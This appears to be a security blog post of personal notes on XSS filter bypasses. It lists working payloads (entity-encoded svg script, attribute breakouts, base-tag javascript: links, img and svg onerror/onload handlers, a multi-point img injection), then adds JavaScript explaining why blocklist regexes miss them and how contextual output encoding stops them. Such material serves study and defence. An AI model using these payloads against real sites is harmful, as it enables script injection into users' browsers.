Notes on XSS cases I have run into

1. `(` and `)` filtered: use entity encoding inside `<svg>`

   ```html
   <svg><script>alert&#40/1/&#41</script>      // Works With All Browsers
   ```

   `(` is HTML-encoded as `&#40`, `)` is HTML-encoded as `&#41`. Inside `<svg>` the `<script>` body is foreign content, so the parser decodes character references before the script runs.

1. Browser parsing closes the current tag first, then looks for new tags

   ```html
   <input type="text" value='<SCRIPT>alert("XSS")</SCRIPT>' />
   ```

1. Injection point inside an attribute value, `<input value="'输出点'" type="text" />`; XSS payload:

   ```html
   "type=&#105;&#109;&#97;&#103;&#101; src onerror ="prompt(1)
   ```

   A line break between `onerror` and `=` still parses, which bypasses regex filters that expect the two on one line.
1. `<input type="text" autofocus=alert(/xss/)>`

1. Chrome: `<base>` tag, cannot be overridden

   ```html
   <base href="javascript:\" /><a href="//%0aalert(1);//">Click Me</a>
   ```

1. `img` source can be written separately

   ```html
   <picture
     ><source srcset="1" />
     <img onerror="alert(1)" />
   </picture>
   ```

1. ES6 backtick `` ` ``

   ```html
   <script>
     alert`1`
   </script>
   ```

1. Chrome only

   ```html
   <img src ?itworksonchrome?\/onerror = alert(1)> <img/src/onerror=alert(1)>
   ```

1. `<svg/onload=alert/**/(1)>`

1. `<svg onload="alert(1)"></svg>`
1. In a JS context

   ```js
   ;(function() {
     alert(1)
   })() //OK

   alert(1) //OK

   aler
   t(1) //aler is not defined
   ```
1. Using `img` across several injection points (the `src` attribute swallows the markup up to the next `"`, and the `/* ... */` comment joins the three comments into one handler)

   ```html
   <p class="comment" title=""><img src="></p>
   <p class="comment" title=""onerror='/*"></p>
   <p class="comment" title="*/prompt(1)'"></p>
   ```
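The attribute cases above (the `type=&#105;...` payload, the note about a line break before `=`, the three-comment `img` case) and the `&#40/1/&#41` case all work because a filter inspects the raw string while the browser acts on the decoded, tokenized markup. The JavaScript below is an added example, not part of the original notes: it shows why two typical blocklist regexes miss these inputs, what the browser actually sees after decoding, and how contextual output encoding removes the problem whatever the input contains. The filters, the encoder functions, the `renderInput` template and the sample inputs (the second input is a constructed newline variant of the page's payload) are all assumptions made for this illustration.

```javascript
// Added example (not from the original notes): blocklist filtering vs. contextual output encoding.
// The filters, encoders, template and sample inputs below are illustrative assumptions.

// Sample inputs (constructed). The first is the page's attribute payload; the second is the
// same payload with a newline between `onerror` and `=`.
const PAYLOAD_ENTITY  = '"type=&#105;&#109;&#97;&#103;&#101; src onerror ="prompt(1)';
const PAYLOAD_NEWLINE = '"type=&#105;&#109;&#97;&#103;&#101; src onerror\n="prompt(1)';

// Two typical blocklist checks, run against the raw (undecoded) input.
const BLOCKLIST_TAG     = /<\s*img|type\s*=\s*["']?image/i; // looks for an image element
const BLOCKLIST_HANDLER = /on\w+ ?=/i;                        // allows a space, not a newline

// Which of the two blocklists fires for a given input.
function blocklistResult(input) {
  return { tag: BLOCKLIST_TAG.test(input), handler: BLOCKLIST_HANDLER.test(input) };
}

// What the tokenizer sees in an attribute: numeric character references decoded,
// with or without the trailing semicolon (as in the `&#40/1/&#41` case).
function decodeNumericEntities(text) {
  return text.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, ref) => {
    const cp = /^x/i.test(ref) ? parseInt(ref.slice(1), 16) : parseInt(ref, 10);
    return String.fromCodePoint(cp);
  });
}

// Contextual encoding for a quoted HTML attribute value: every character outside
// [A-Za-z0-9] becomes a numeric reference, so quotes, `=`, `<`, whitespace and `&`
// can never close the attribute or start a new one. An `&#...;` already present in
// the input is encoded too, so the browser displays it literally instead of decoding it.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu,
    ch => '&#x' + ch.codePointAt(0).toString(16) + ';');
}

// Same idea for data placed inside a JavaScript string literal (the "in a JS context"
// case): \u escapes keep `</script>`, quotes and line terminators from ending the literal.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, ch => {
    const cp = ch.codePointAt(0);
    return cp <= 0xffff ? '\\u' + cp.toString(16).padStart(4, '0')
                        : '\\u{' + cp.toString(16) + '}';
  });
}

// Hypothetical template for the `<input value="...">` injection point above.
function renderInput(userValue) {
  return '<input value="' + encodeForHtmlAttribute(userValue) + '" type="text" />';
}

// Structural check on the rendered markup: the value holds only alphanumerics and
// reference characters, and the tag still has exactly the two declared attributes.
function inputStaysIntact(html) {
  return /^<input value="[A-Za-z0-9&#;]*" type="text" \/>$/.test(html);
}

// Stand-alone run: each payload's blocklist result on the raw and on the decoded
// form, then the safely rendered markup.
for (const p of [PAYLOAD_ENTITY, PAYLOAD_NEWLINE]) {
  console.log('raw    :', blocklistResult(p));
  console.log('decoded:', blocklistResult(decodeNumericEntities(p)));
  console.log('render :', renderInput(p), inputStaysIntact(renderInput(p)));
}
```

The two regexes fail for different reasons: the tag check compares text the browser has not yet decoded, and the handler check hard-codes one whitespace form. Encoding the output for its context needs neither guess, which is why it is the fix rather than a longer blocklist.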

Some references

核总, hookjoy